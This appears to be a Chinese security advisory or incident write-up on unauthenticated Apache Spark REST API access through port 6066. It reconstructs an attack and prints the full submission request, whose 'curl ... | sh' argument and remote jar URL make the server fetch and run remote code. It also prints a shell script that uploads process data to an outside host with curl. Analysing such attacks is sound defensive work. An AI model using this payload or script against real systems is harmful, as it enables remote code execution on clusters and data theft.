一、漏洞详情说明
时间:2022-03-23 15:03:02 | 来源:行业动态
时间:2022-03-23 15:03:02 来源:行业动态
Apache Spark 是专为大规模数据处理而设计的快速通用的计算引擎,是UC Berkeley AMP lab(加州大学伯克利分校的AMP实验室)所开源的类Hadoop MapReduce的通用并行框架。为了让使用者能够方便的控制系统进行计算和查看任务结果,Spark也提供了 WEB UI图形化界面和相应的 REST API来方便用户操作。
Spark作为大数据时代的计算引擎,一旦被攻破,企业的核心数据资产、计算能力、用户敏感数据都将被攻击者窃取;更进一步的,由于Spark自身的分布式特性,一个攻击点的攻破可能导致整个集群的沦陷。Spark权限设置不当,可能导致攻击者无需认证即可通过该 REST API来操作Spark创建任务、删除任务、查看任务结果等,从而最终获得执行任意指令的能力。
我们还原了攻击者的攻击步骤:
1. 攻击者通过web扫描的方式发现了一台Spark webui服务
2. 构造攻击指令,并通过6066端口发送到该服务器的REST API
POST /v1/submissions/create
host:xxxx.xxx.xx:6066
{ "action": "CreateSubmissionRequest", "clientSparkVersion": "2.1.0", "appArgs": [ "curl x.x.x.x/y.sh|sh" ], "appResource": "https://xxxx.onion.plus/SimpleApp.jar", "environmentVariables": { "SPARK_ENV_LOADED": "1" }, "mainClass": "SimpleApp", "sparkProperties": { "spark.jars": "https://xxxxxxxx.onion.plus/SimpleApp.jar", "spark.driver.supervise": "false", "spark.app.name": "SimpleApp", "spark.eventLog.enabled": "false", "spark.submit.deployMode": "cluster", "spark.master": "spark://x.x.x.x:6066" } }
该攻击payload指示服务器远程下载https://xxxxxxxx.onion.plus/SimpleApp.jar ,并执行攻击者指定的任意方法,该攻击者还通过洋葱网络来隐藏自己的相关信息。
3.对该 jar 包进行逆向分析,该 jar 包即是一个简单的执行命令的后门,
执行 jar 包时,Spark服务器将会从洋葱网络中下载一段shell脚本并执行。
4.脚本内容如下:
#!/bin/bash
ps ax --sort=-pcpu /tmp/tmp.txt
curl -F "file=@/tmp/tmp.txt" http://x.x.x.x/re.php
rm -rf /tmp/tmp.txt
该脚本只是简单的将性能信息打印并回传,暂未进行进一步的攻击。